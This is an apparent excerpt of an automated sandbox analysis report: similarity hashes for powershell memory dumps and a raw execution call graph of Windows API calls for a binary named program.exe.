                                                                                                                                                                                                                                              • Instruction ID: 1ea930747b04b282ef89cd8a57ac70b22a2fdc70aa76fb00a3aace7666c02118
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 603ee98ef949dc6b4199bc1dcfb392f4323efef4face4d16625b4ae652fd9795
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F2F09A32B0D5058FD7B9EA4CA8948A873F0EF4A32171500FBE159C71A7CA26EC80C742
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.1929778258.00007FFD9A5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A5B0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ffd9a5b0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 9274ccc6ac2e189046b7dbbf2b5720d8562167da5c679a720495ab583625eaf6
                                                                                                                                                                                                                                              • Instruction ID: 0cc6c9e10a83476e0b1dd19e83c18a65e10e7981dbdd3499efc57e456004a491
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9274ccc6ac2e189046b7dbbf2b5720d8562167da5c679a720495ab583625eaf6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D7F05E32B0D5448FDBA9EE5CE4958A877F0EF0632571510F7E159C75A7CA26AC40C741
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.1928918265.00007FFD9A4E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A4E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ffd9a4e0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: L_^$L_^$L_^$L_^$L_^$L_^$L_^
                                                                                                                                                                                                                                              • API String ID: 0-358832956
                                                                                                                                                                                                                                              • Opcode ID: d21154742f999148821eb2bfc24e736ac9d72b24ea6ddc28efa38152a48e4c71
                                                                                                                                                                                                                                              • Instruction ID: 23d2bf42f17fa08abe4851f96e8f09baa89d5ae1d6c1ec4400146a00ff251b70
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d21154742f999148821eb2bfc24e736ac9d72b24ea6ddc28efa38152a48e4c71
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A0710297F0EAC30AE76A4ABD68751A57BD0EF52354B2D01F6C0DC8A0A3ED196C068753
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000002A.00000002.1994470884.00007FFD9A5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A5A0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_42_2_7ffd9a5a0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 457abc6f10abe163c2b6dce073789d151ba4809e254ec9ce9c02712f3c3f30d9
                                                                                                                                                                                                                                              • Instruction ID: 8d88ca9b9556be41970e09a6328202088f12b23bbce516eb047c987e78de76e8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 457abc6f10abe163c2b6dce073789d151ba4809e254ec9ce9c02712f3c3f30d9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 05A11862B0DB854FE7AB9A6848651B57BE1EF87320B1941FFD04DC71E3DE18A806C351
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000002A.00000002.1994470884.00007FFD9A5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A5A0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_42_2_7ffd9a5a0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
• String ID:
• API String ID:
• Opcode ID: cd21fb031576acbe2ad2db43e9f06e5de0d77f18280fc4e08f2a8ed9c1ae9fd8
• Instruction ID: a8949a15d5e0640d402c1d4167de538688b21b2e6a10b78103937854a0db3c4e
• Opcode Fuzzy Hash: cd21fb031576acbe2ad2db43e9f06e5de0d77f18280fc4e08f2a8ed9c1ae9fd8
• Instruction Fuzzy Hash: CC711423F0EA994FE7BA9AA858655B57BD1FF86310B1801FAD05DC31D7ED18AC05C342
Memory Dump Source
• Source File: 0000002A.00000002.1993662840.00007FFD9A4D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A4D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_7ffd9a4d0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7204be0f352d38a7c8cf03cf29e20d36eb8a7981a3677f71610394fe21190b2c
• Instruction ID: 17e939447984b0e04a89c714b1c475f11e8dfa07fbb1d7b27b30a35d1e3b97df
• Opcode Fuzzy Hash: 7204be0f352d38a7c8cf03cf29e20d36eb8a7981a3677f71610394fe21190b2c
• Instruction Fuzzy Hash: E3413D71E18A088FDB58EFACD8915ACB7F1EF59315B1441ADD40EE7292CF35A842CB81
Memory Dump Source
• Source File: 0000002A.00000002.1993662840.00007FFD9A4D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A4D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_7ffd9a4d0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 012b2405407794b4d79654df0742d776903c17c8c31c1b569b9b95dbaf4e4f07
• Instruction ID: ab8f2c3a96d53b3f7e44af16d713040c67af03ad229a4c6a2da26d1a14756fe0
• Opcode Fuzzy Hash: 012b2405407794b4d79654df0742d776903c17c8c31c1b569b9b95dbaf4e4f07
• Instruction Fuzzy Hash: E2112E71E186198FEB58EF58D4552ACB7A1EF58315F24416DD00EE7285CF35A842CB44
Memory Dump Source
• Source File: 0000002A.00000002.1993662840.00007FFD9A4D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A4D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_7ffd9a4d0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
• Instruction ID: 7bf64428fcf30c46270b6fc06329f52be7a7907989bdb226c8e40e3ffa0b6f0f
• Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
• Instruction Fuzzy Hash: D101A73120CB0C4FD758EF0CE451AA5B7E0FB85324F10056DE58AC36A5D736E882CB46

Execution Graph

Execution Coverage: 8%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0.5%
Total number of Nodes: 1241
Total number of Limit Nodes: 41
execution_graph (rendered as a figure in the report; the raw node/edge list is not reproduced here). Recoverable content of the graph for the main image mapped at 0x7ff64fe50000 (program.exe): call-graph roots at 7ff64feb2450, 7ff64fe57a5b, 7ff64fe9bb70, 7ff64feb9c74, 7ff64fe9a924 and 7ff64fe53b53. Notable API-calling nodes: 7ff64fe6901c (CryptAcquireContextW, CryptGenRandom, CryptReleaseContext) followed by 7ff64fe69c9c (GetSystemTime, SystemTimeToFileTime, QueryPerformanceCounter); 7ff64fe71e1c (GetFileTime) and 7ff64fe71e80 (CreateFileW, GetLastError, SetFileTime); 7ff64fe72440 (SetFilePointer, GetLastError); 7ff64fe72574 (GetStdHandle, WriteFile, GetLastError, SetLastError); 7ff64fe5c3c8 (CharLowerW, CharUpperW), 7ff64fe9d840 (WideCharToMultiByte) and 7ff64fe5b8f8 (CharToOemA); 7ff64fe97ec8 and 7ff64fe97f24 (GetProcAddressForCaller, GetProcAddress, GetCurrentProcessId) with 7ff64fe9b3f0 (GetSystemDirectoryW) and 7ff64fe848bc (LoadLibraryExW); 7ff64fe9a924 (sprintf, CompareStringA); 7ff64fe9b974 (WaitForSingleObject, GetLastError), 7ff64fe616c2 (EnterCriticalSection), 7ff64fe9bbc8 (SetEvent) and 7ff64fe9bbd5 (LeaveCriticalSection); heap routines 7ff64feb4a74 (RtlFreeHeap), 7ff64feb4ab4 (RtlAllocateHeap) and 7ff64feb4b8c (RtlReAllocateHeap); CRT error handling at 7ff64feaa6a0 (IsProcessorFeaturePresent), 7ff64feaa894 (RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind) and 7ff64feaa66c (SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess), plus RtlPcToFileHeader/RaiseException throw helpers (7ff64feaba34, 7ff64feab2f4, 7ff64feab314). CRT symbols resolved on graph nodes: pre_c_initialization, __scrt_fastfail, _CxxThrowException, std::bad_alloc::bad_alloc, _handle_error, __report_securityfailure, _invalid_parameter_noinfo, __vcrt_getptd_noexit, __vcrt_uninitialize_ptd, __free_lconv_num, FindHandlerForForeignException, memcpy_s, wcschr, abort.
38989->38987 38990 7ff64fe71f78 CreateFileW GetLastError 38990->38989 38991->38933 39035 7ff64fe724e8 38992->39035 38995 7ff64fe7240e 38995->38935 38998 7ff64fe71c3b 38997->38998 38999 7ff64fe71c37 38997->38999 38998->38999 39000 7ff64fe71c5d 38998->39000 38999->38940 39052 7ff64fe72d6c 12 API calls 2 library calls 39000->39052 39002->38939 39003->38944 39005->38950 39006->38954 39007->38956 39008->38959 39009->38962 39010->38946 39011->38951 39013 7ff64fe718db 39012->39013 39014 7ff64fe718ca 39012->39014 39013->38962 39014->39013 39015 7ff64fe718d6 39014->39015 39016 7ff64fe718de 39014->39016 39017 7ff64fe71c24 12 API calls 39015->39017 39053 7ff64fe71930 39016->39053 39017->39013 39021 7ff64fe84549 pre_c_initialization 39020->39021 39031 7ff64fe845a2 39021->39031 39032 7ff64fe8472c CharUpperW 39021->39032 39023 7ff64feaa610 _handle_error 8 API calls 39025 7ff64fe71f74 39023->39025 39024 7ff64fe84579 39033 7ff64fe84760 CharUpperW 39024->39033 39025->38989 39025->38990 39027 7ff64fe84592 39028 7ff64fe8459a 39027->39028 39029 7ff64fe84629 GetCurrentDirectoryW 39027->39029 39034 7ff64fe8472c CharUpperW 39028->39034 39029->39031 39031->39023 39032->39024 39033->39027 39034->39031 39041 7ff64fe71af0 39035->39041 39038 7ff64fe723f9 39038->38995 39040 7ff64fe6ca40 61 API calls _CxxThrowException 39038->39040 39040->38995 39042 7ff64fe71b01 pre_c_initialization 39041->39042 39043 7ff64fe71b6f CreateFileW 39042->39043 39044 7ff64fe71b68 39042->39044 39043->39044 39045 7ff64fe71be1 39044->39045 39046 7ff64fe84534 10 API calls 39044->39046 39049 7ff64feaa610 _handle_error 8 API calls 39045->39049 39047 7ff64fe71bb3 39046->39047 39047->39045 39048 7ff64fe71bb7 CreateFileW 39047->39048 39048->39045 39050 7ff64fe71c14 39049->39050 39050->39038 39051 7ff64fe6ca08 10 API calls 39050->39051 39051->39038 39052->38999 39054 7ff64fe7194c 39053->39054 39057 7ff64fe71964 39053->39057 39056 7ff64fe71958 CloseHandle 39054->39056 39054->39057 39055 7ff64fe71988 39055->39013 39056->39057 
39057->39055 39059 7ff64fe6c9d0 10 API calls 39057->39059 39059->39055 39060 7ff64fe51884 39192 7ff64fe834e4 39060->39192 39063 7ff64fe834e4 CompareStringW 39065 7ff64fe518a6 39063->39065 39064 7ff64fe51926 39066 7ff64fe5195b 39064->39066 39256 7ff64fe83f98 63 API calls 2 library calls 39064->39256 39068 7ff64fe834e4 CompareStringW 39065->39068 39074 7ff64fe518b9 39065->39074 39072 7ff64fe51970 39066->39072 39257 7ff64fe72ed8 100 API calls 3 library calls 39066->39257 39068->39074 39071 7ff64fe51915 39255 7ff64fe6ca40 61 API calls _CxxThrowException 39071->39255 39075 7ff64fe519b8 39072->39075 39258 7ff64fe949f4 48 API calls 39072->39258 39074->39064 39254 7ff64fe51168 8 API calls 2 library calls 39074->39254 39196 7ff64fe55450 39075->39196 39077 7ff64fe519b0 39259 7ff64fe68444 54 API calls fflush 39077->39259 39083 7ff64fe572c4 76 API calls 39090 7ff64fe51a12 39083->39090 39084 7ff64fe51ae6 39230 7ff64fe57514 39084->39230 39085 7ff64fe51b04 39234 7ff64fe66c94 39085->39234 39088 7ff64fe51af2 39089 7ff64fe57514 72 API calls 39088->39089 39091 7ff64fe51aff 39089->39091 39090->39084 39090->39085 39092 7ff64feaa610 _handle_error 8 API calls 39091->39092 39093 7ff64fe52f97 39092->39093 39094 7ff64fe51b13 39250 7ff64fe57148 39094->39250 39096 7ff64fe51c71 39097 7ff64fe51ca7 39096->39097 39098 7ff64fe563e8 8 API calls 39096->39098 39099 7ff64fe51ce4 39097->39099 39100 7ff64fe51cd5 39097->39100 39101 7ff64fe51c91 39098->39101 39102 7ff64feaa444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39099->39102 39104 7ff64feaa444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39100->39104 39103 7ff64fe549b8 99 API calls 39101->39103 39108 7ff64fe51cee 39102->39108 39105 7ff64fe51c9d 39103->39105 39104->39108 39106 7ff64fe563e8 8 API calls 39105->39106 39106->39097 39107 7ff64fe51d50 39110 7ff64feaa444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39107->39110 39108->39107 39109 
7ff64fe9de30 72 API calls 39108->39109 39109->39107 39111 7ff64fe51d62 39110->39111 39112 7ff64fe9dbd0 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39111->39112 39113 7ff64fe51d7b 39111->39113 39112->39113 39114 7ff64fea2bcc 66 API calls 39113->39114 39115 7ff64fe51dba 39114->39115 39187 7ff64fe7ae10 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39115->39187 39116 7ff64fe51e1c 39118 7ff64fe510c0 8 API calls 39116->39118 39120 7ff64fe51e5d 39116->39120 39117 7ff64fe51dde std::bad_alloc::bad_alloc 39117->39116 39119 7ff64feaba34 _CxxThrowException RtlPcToFileHeader RaiseException 39117->39119 39118->39120 39119->39116 39121 7ff64fe5a410 159 API calls 39120->39121 39186 7ff64fe51ef4 39120->39186 39121->39186 39122 7ff64fe52d0c 39124 7ff64fe9de30 72 API calls 39122->39124 39133 7ff64fe52d21 39122->39133 39123 7ff64fe52ccc 39123->39122 39191 7ff64fe78c80 72 API calls 39123->39191 39124->39133 39125 7ff64fe52d86 39130 7ff64fe949f4 48 API calls 39125->39130 39168 7ff64fe52dd0 39125->39168 39126 7ff64fe949f4 48 API calls 39184 7ff64fe52005 39126->39184 39127 7ff64fe76688 48 API calls 39127->39186 39128 7ff64fe9b6d0 73 API calls 39128->39184 39129 7ff64fe55e70 169 API calls 39129->39184 39134 7ff64fe52d9e 39130->39134 39131 7ff64fe5a504 208 API calls 39131->39168 39132 7ff64fe580e4 192 API calls 39132->39168 39133->39125 39135 7ff64fe949f4 48 API calls 39133->39135 39138 7ff64fe68444 54 API calls 39134->39138 39140 7ff64fe52d6c 39135->39140 39136 7ff64fe55928 237 API calls 39136->39184 39137 7ff64fe5e6c8 157 API calls 39137->39186 39142 7ff64fe52da6 39138->39142 39139 7ff64fe77c7c 127 API calls 39139->39168 39143 7ff64fe949f4 48 API calls 39140->39143 39141 7ff64fe5a410 159 API calls 39141->39186 39150 7ff64fe71c24 12 API calls 39142->39150 39147 7ff64fe52d79 39143->39147 39144 7ff64fe6e21c 63 API calls 39144->39184 39145 7ff64fe51168 8 API calls 39145->39168 39146 7ff64fe5b540 147 API calls 39146->39186 39148 
7ff64fe68444 54 API calls 39147->39148 39148->39125 39149 7ff64fe765b4 48 API calls 39149->39186 39150->39168 39151 7ff64fe5a4d0 12 API calls 39151->39186 39152 7ff64fe74554 16 API calls 39152->39186 39153 7ff64fe71998 138 API calls 39153->39186 39154 7ff64fe9ae50 71 API calls 39157 7ff64fe52e39 39154->39157 39155 7ff64fe533b4 64 API calls 39155->39168 39156 7ff64fe55db4 46 API calls 39156->39186 39157->39154 39158 7ff64fe6ca40 61 API calls 39157->39158 39157->39168 39158->39168 39159 7ff64fe56188 231 API calls 39159->39168 39160 7ff64fe71e80 15 API calls 39160->39186 39161 7ff64fe77c7c 127 API calls 39161->39186 39162 7ff64fe71930 11 API calls 39162->39186 39163 7ff64fe53f74 138 API calls 39163->39168 39164 7ff64fe5b540 147 API calls 39164->39184 39165 7ff64fe6cbd0 75 API calls 39165->39186 39166 7ff64fe949f4 48 API calls 39166->39168 39167 7ff64fe8ba9c 195 API calls 39167->39168 39168->39131 39168->39132 39168->39139 39168->39145 39168->39155 39168->39157 39168->39159 39168->39163 39168->39166 39168->39167 39170 7ff64fe68444 54 API calls 39168->39170 39169 7ff64fe55004 49 API calls 39169->39186 39170->39168 39171 7ff64fe5571c 12 API calls 39171->39186 39172 7ff64fe718ac 15 API calls 39172->39186 39173 7ff64fe51168 8 API calls 39173->39186 39174 7ff64fe9d48c 58 API calls 39174->39186 39175 7ff64fe55e70 169 API calls 39175->39186 39176 7ff64fe69be0 14 API calls 39176->39186 39177 7ff64fe9c0a8 10 API calls 39177->39186 39178 7ff64fe76378 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39178->39186 39179 7ff64fe897f0 GetStdHandle ReadFile GetLastError GetLastError GetFileType 39179->39186 39180 7ff64fe75c0c 237 API calls 39180->39186 39181 7ff64fe75d40 237 API calls 39181->39186 39182 7ff64fe56114 216 API calls 39182->39186 39183 7ff64fe75708 237 API calls 39183->39186 39184->39126 39184->39128 39184->39129 39184->39136 39184->39144 39184->39164 39185 7ff64fe68444 54 API calls 39184->39185 39184->39186 39185->39184 39186->39123 39186->39127 
39186->39137 39186->39141 39186->39146 39186->39149 39186->39151 39186->39152 39186->39153 39186->39156 39186->39160 39186->39161 39186->39162 39186->39165 39186->39169 39186->39171 39186->39172 39186->39173 39186->39174 39186->39175 39186->39176 39186->39177 39186->39178 39186->39179 39186->39180 39186->39181 39186->39182 39186->39183 39186->39184 39188 7ff64fe7a250 237 API calls 39186->39188 39189 7ff64fe7aae0 237 API calls 39186->39189 39190 7ff64fe60d60 237 API calls 39186->39190 39187->39117 39188->39186 39189->39184 39190->39184 39191->39122 39193 7ff64fe834f6 39192->39193 39194 7ff64fe51893 39193->39194 39260 7ff64fe9dac0 CompareStringW 39193->39260 39194->39063 39194->39074 39197 7ff64fe5546f pre_c_initialization 39196->39197 39198 7ff64fe5554a __scrt_fastfail 39197->39198 39214 7ff64fe55588 __scrt_fastfail 39197->39214 39201 7ff64fe9c0a8 10 API calls 39198->39201 39200 7ff64fe55583 39290 7ff64fe56eb8 39200->39290 39202 7ff64fe55576 39201->39202 39205 7ff64fe5681c 54 API calls 39202->39205 39205->39200 39206 7ff64fe556e9 39297 7ff64fe96f68 39206->39297 39208 7ff64fe556f6 39209 7ff64feaa610 _handle_error 8 API calls 39208->39209 39210 7ff64fe519df 39209->39210 39216 7ff64fe572c4 39210->39216 39214->39200 39261 7ff64fe53210 39214->39261 39267 7ff64fe67088 39214->39267 39271 7ff64fe5681c 39214->39271 39282 7ff64fe97a24 39214->39282 39301 7ff64fe5571c 39214->39301 39309 7ff64fe64380 14 API calls 39214->39309 39217 7ff64fe572eb 39216->39217 39404 7ff64fe688dc 39217->39404 39219 7ff64fe57302 39408 7ff64fe8915c 39219->39408 39221 7ff64fe5730f 39420 7ff64fe87044 39221->39420 39224 7ff64feaa444 new 4 API calls 39225 7ff64fe573e3 39224->39225 39226 7ff64fe573f5 __scrt_fastfail 39225->39226 39425 7ff64fe7894c 39225->39425 39228 7ff64fe69be0 14 API calls 39226->39228 39229 7ff64fe51a01 39228->39229 39229->39083 39231 7ff64fe57539 39230->39231 39451 7ff64fe8922c 39231->39451 39235 7ff64fe66d45 39234->39235 39238 7ff64fe66cbc 39234->39238 39236 7ff64fe66d83 39235->39236 
39239 7ff64fe66d69 39235->39239 39467 7ff64fe89f78 8 API calls 2 library calls 39235->39467 39236->39094 39237 7ff64fe66cd9 39241 7ff64fe66cf3 39237->39241 39463 7ff64fe89f78 8 API calls 2 library calls 39237->39463 39238->39237 39462 7ff64fe89f78 8 API calls 2 library calls 39238->39462 39239->39236 39468 7ff64fe89f78 8 API calls 2 library calls 39239->39468 39244 7ff64fe66d0d 39241->39244 39464 7ff64fe89f78 8 API calls 2 library calls 39241->39464 39247 7ff64fe66d2b 39244->39247 39465 7ff64fe89f78 8 API calls 2 library calls 39244->39465 39247->39236 39466 7ff64fe89f78 8 API calls 2 library calls 39247->39466 39251 7ff64fe57167 39250->39251 39252 7ff64fe57162 39250->39252 39469 7ff64fe56c64 130 API calls _handle_error 39252->39469 39254->39071 39255->39064 39256->39066 39257->39072 39258->39077 39259->39075 39260->39194 39262 7ff64fe532e9 39261->39262 39263 7ff64fe53231 39261->39263 39262->39214 39263->39262 39310 7ff64fe64380 14 API calls 39263->39310 39265 7ff64fe5329c 39265->39262 39311 7ff64fe72a20 22 API calls 2 library calls 39265->39311 39268 7ff64fe670a4 39267->39268 39270 7ff64fe670c5 39268->39270 39312 7ff64fe78558 10 API calls 2 library calls 39268->39312 39270->39214 39313 7ff64fe56714 39271->39313 39273 7ff64fe56836 39274 7ff64fe56853 39273->39274 39324 7ff64feb48c0 31 API calls _invalid_parameter_noinfo 39273->39324 39274->39214 39276 7ff64fe5684b 39276->39274 39277 7ff64fe568a9 std::bad_alloc::bad_alloc 39276->39277 39325 7ff64feaba34 RtlPcToFileHeader RaiseException 39277->39325 39279 7ff64fe568c4 39326 7ff64fe57188 12 API calls 39279->39326 39281 7ff64fe568eb 39281->39214 39283 7ff64fe97a4f 39282->39283 39288 7ff64fe97a59 39282->39288 39283->39214 39284 7ff64fe97a7c 39363 7ff64fe9b6d0 73 API calls _Init_thread_footer 39284->39363 39287 7ff64fe97b1c 60 API calls 39287->39288 39288->39283 39288->39284 39288->39287 39331 7ff64fe971fc 39288->39331 39364 7ff64fe641b0 14 API calls 2 library calls 39288->39364 39291 7ff64fe56ee6 39290->39291 39296 
7ff64fe56f5c 39290->39296 39397 7ff64fe99f64 8 API calls memcpy_s 39291->39397 39293 7ff64fe56efb 39294 7ff64fe56f2f 39293->39294 39293->39296 39294->39293 39398 7ff64fe57188 12 API calls 39294->39398 39296->39206 39298 7ff64fe96fb4 39297->39298 39300 7ff64fe96f8a 39297->39300 39299 7ff64fe74538 FindClose 39299->39300 39300->39298 39300->39299 39302 7ff64fe55742 39301->39302 39307 7ff64fe5575d 39301->39307 39302->39307 39403 7ff64fe83520 12 API calls 2 library calls 39302->39403 39306 7ff64fe557fc 39306->39214 39399 7ff64fe83610 39307->39399 39308 7ff64fe848bc 8 API calls 39308->39306 39309->39214 39310->39265 39311->39262 39312->39268 39314 7ff64fe56738 39313->39314 39323 7ff64fe567a7 memcpy_s 39313->39323 39315 7ff64fe56765 39314->39315 39327 7ff64fe6ca6c 48 API calls 3 library calls 39314->39327 39319 7ff64fe567e1 39315->39319 39320 7ff64fe56786 39315->39320 39317 7ff64fe56759 39328 7ff64fe6cb64 8 API calls 39317->39328 39319->39323 39330 7ff64fe6cb64 8 API calls 39319->39330 39320->39323 39329 7ff64fe6cb64 8 API calls 39320->39329 39323->39273 39324->39276 39325->39279 39326->39281 39327->39317 39336 7ff64fe97217 pre_c_initialization 39331->39336 39332 7ff64feaa610 _handle_error 8 API calls 39334 7ff64fe9776f 39332->39334 39334->39288 39347 7ff64fe9725a 39336->39347 39348 7ff64fe9729c 39336->39348 39360 7ff64fe973c5 39336->39360 39372 7ff64fe74554 39336->39372 39337 7ff64fe97453 39340 7ff64fe97464 39337->39340 39341 7ff64fe97476 39337->39341 39339 7ff64fe976ef 39339->39347 39383 7ff64fe78558 10 API calls 2 library calls 39339->39383 39380 7ff64fe97c38 55 API calls 3 library calls 39340->39380 39355 7ff64fe97496 39341->39355 39369 7ff64fe74538 39341->39369 39343 7ff64fe97342 39343->39339 39343->39347 39353 7ff64fe97656 39343->39353 39381 7ff64fe64380 14 API calls 39343->39381 39344 7ff64fe97471 39344->39341 39347->39332 39349 7ff64fe973bb 39348->39349 39351 7ff64fe9732e 39348->39351 39352 7ff64feaa444 new 4 API calls 39349->39352 39351->39343 39354 7ff64fe9734a 
39351->39354 39352->39360 39353->39339 39353->39347 39361 7ff64fe97723 39353->39361 39354->39347 39356 7ff64fe9737e 39354->39356 39378 7ff64fe64380 14 API calls 39354->39378 39355->39347 39357 7ff64fe74554 16 API calls 39355->39357 39356->39347 39379 7ff64fe6cbd0 75 API calls 39356->39379 39357->39347 39365 7ff64fe745cc 39360->39365 39382 7ff64fe5c214 8 API calls 2 library calls 39361->39382 39364->39288 39367 7ff64fe745ed 39365->39367 39366 7ff64fe746ec 15 API calls 39366->39367 39367->39366 39368 7ff64fe746b2 39367->39368 39368->39337 39368->39343 39370 7ff64fe74549 FindClose 39369->39370 39371 7ff64fe7454f 39369->39371 39370->39371 39371->39355 39373 7ff64fe74570 39372->39373 39374 7ff64fe74574 39373->39374 39384 7ff64fe746ec 39373->39384 39374->39348 39377 7ff64fe7458d FindClose 39377->39374 39378->39356 39379->39347 39380->39344 39381->39353 39382->39347 39383->39347 39385 7ff64fe74705 pre_c_initialization 39384->39385 39386 7ff64fe747a4 FindNextFileW 39385->39386 39387 7ff64fe74733 FindFirstFileW 39385->39387 39389 7ff64fe747ae GetLastError 39386->39389 39396 7ff64fe7478b 39386->39396 39388 7ff64fe74749 39387->39388 39387->39396 39390 7ff64fe84534 10 API calls 39388->39390 39389->39396 39391 7ff64fe7475b 39390->39391 39393 7ff64fe7477a GetLastError 39391->39393 39394 7ff64fe7475f FindFirstFileW 39391->39394 39392 7ff64feaa610 _handle_error 8 API calls 39395 7ff64fe74587 39392->39395 39393->39396 39394->39393 39394->39396 39395->39374 39395->39377 39396->39392 39397->39293 39398->39294 39401 7ff64fe83626 pre_c_initialization wcschr 39399->39401 39400 7ff64feaa610 _handle_error 8 API calls 39402 7ff64fe557e1 39400->39402 39401->39400 39402->39306 39402->39308 39403->39307 39405 7ff64fe68919 39404->39405 39430 7ff64fe94b14 39405->39430 39407 7ff64fe68954 __scrt_fastfail 39407->39219 39409 7ff64fe89199 39408->39409 39410 7ff64feaa480 4 API calls 39409->39410 39411 7ff64fe891be 39410->39411 39412 7ff64feaa444 new 4 API calls 39411->39412 39413 7ff64fe891cf 
39412->39413 39414 7ff64fe891e1 39413->39414 39415 7ff64fe688dc 8 API calls 39413->39415 39416 7ff64feaa444 new 4 API calls 39414->39416 39415->39414 39417 7ff64fe891f7 39416->39417 39418 7ff64fe688dc 8 API calls 39417->39418 39419 7ff64fe89209 39417->39419 39418->39419 39419->39221 39421 7ff64fe688dc 8 API calls 39420->39421 39422 7ff64fe87063 39421->39422 39423 7ff64fe872c0 4 API calls 39422->39423 39424 7ff64fe57325 39423->39424 39424->39224 39424->39226 39435 7ff64fe97d80 39425->39435 39431 7ff64fe94b26 39430->39431 39432 7ff64fe94b2b 39430->39432 39434 7ff64fe94b38 8 API calls _handle_error 39431->39434 39432->39407 39434->39432 39442 7ff64fe98094 39435->39442 39438 7ff64fe78a44 39439 7ff64fe78a5a __scrt_fastfail 39438->39439 39446 7ff64fe9bac4 39439->39446 39443 7ff64fe9809f 39442->39443 39444 7ff64fe97ec8 68 API calls 39443->39444 39445 7ff64fe7896e 39444->39445 39445->39438 39449 7ff64fe9ba70 GetCurrentProcess GetProcessAffinityMask 39446->39449 39450 7ff64fe789c5 39449->39450 39450->39226 39452 7ff64fe89245 39451->39452 39459 7ff64fe76194 72 API calls 39452->39459 39454 7ff64fe892b1 39460 7ff64fe76194 72 API calls 39454->39460 39456 7ff64fe892bd 39461 7ff64fe76194 72 API calls 39456->39461 39458 7ff64fe892c9 39459->39454 39460->39456 39461->39458 39462->39237 39463->39241 39464->39244 39465->39247 39466->39235 39467->39239 39468->39236 39469->39251 39470 7ff64feb231c 39471 7ff64feb2342 GetModuleHandleW 39470->39471 39472 7ff64feb238c 39470->39472 39471->39472 39473 7ff64feb234f 39471->39473 39483 7ff64feb6938 EnterCriticalSection 39472->39483 39473->39472 39484 7ff64feb24d4 GetModuleHandleExW 39473->39484 39475 7ff64feb6998 abort LeaveCriticalSection 39476 7ff64feb2460 39475->39476 39479 7ff64feb2488 11 API calls 39476->39479 39482 7ff64feb246c 39476->39482 39477 7ff64feb2396 39478 7ff64feb2410 39477->39478 39480 7ff64feb43b8 16 API calls 39477->39480 39478->39475 39479->39482 39480->39478 39485 7ff64feb24fe GetProcAddress 39484->39485 39486 7ff64feb2525 
